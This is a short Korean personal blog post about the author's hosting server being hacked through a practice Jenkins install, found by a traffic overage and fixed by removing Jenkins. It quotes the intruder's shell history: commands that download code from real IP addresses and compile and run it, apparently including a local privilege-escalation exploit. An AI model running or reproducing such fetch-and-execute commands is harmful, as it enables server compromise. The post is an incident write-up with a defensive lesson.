준호씨의 블로그

웹호스팅 해킹 당함 본문

IT이야기

웹호스팅 해킹 당함

준호씨 2015. 11. 3. 23:11
반응형

좀 더 자세한 히스토리는 페이스북 쓰레드 확인

https://www.facebook.com/junho85/posts/10205263083553199


대략 2주 정도 전 인 것 같다. 호스팅 트래픽 초과 문자가 왔다. 80% 초과 했을 때 먼저 문자를 보내 준다고 안내 되어 있으나 빠른 속도로 트래픽이 다 찬 탓인지 이미 100% 초과 한 다음에서야 문자가 왔다. 1GB 초과당 120원이 부과 되는데 해킹으로 의심되는 증상으로 트래픽 초과 한 부분이라 특별히 한 번 감면 해 준다고 했다. 다행;;


트래픽이 계속 늘어 나는 것을 막기 위해 일단 트래픽 차단을 걸어 두고 트래픽 리셋이 된 후에야 후속 조치를 할 수 있었다.


user jenkins 로 실행 되던 Oracle 이라는 프로세스가 수상 해서 강제로 kill 했었는데 그것이 범인이 맞았다.


정확한 원인은 따로 확인은 안 해 봤으나 수상한 프로세스나 /tmp 에 있던 수상한 파일들의 user 정보가 jenkins 였다는 점으로 미루어 보다 1차 원인은 jenkins 였던 것으로 보인다.

public 서버에서 jenkins 는 안돌려야 겠다;; 그냥 연습삼아 깔았던 jenkins 로 인해 문제가 생길 줄이야 ㅠㅠ


http://dan.thoeisen.dk/hjem/lets-hack-a-jenkins-server/

이런 류의 글들이 많은 것으로 보아 script console 등을 통해 뭔가 수행 했으리라 추측 된다.


jenkins 계정의 .bash_history 내용은 다음과 같았다.

cd /tmp

gcc

wget http://120.25.12.45/1.c

gcc 1.c -o 1

chmod 777 1

./1

wget http://43.230.147.24:8080/Oracle

chmod 777 Oracle

./Oracle

exit

1.c 파일은 http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html 에 나와 있는 보안 문제를 이용하여 root 권한을 얻기 위한 것이 아닐까 추측된다.


아무튼 apt-get remove jenkins 로 jenkins 는 제거 했다. public ip 를 사용하는 서버에서는 특히나 보안에 주의 해야 겠다.




반응형
Comments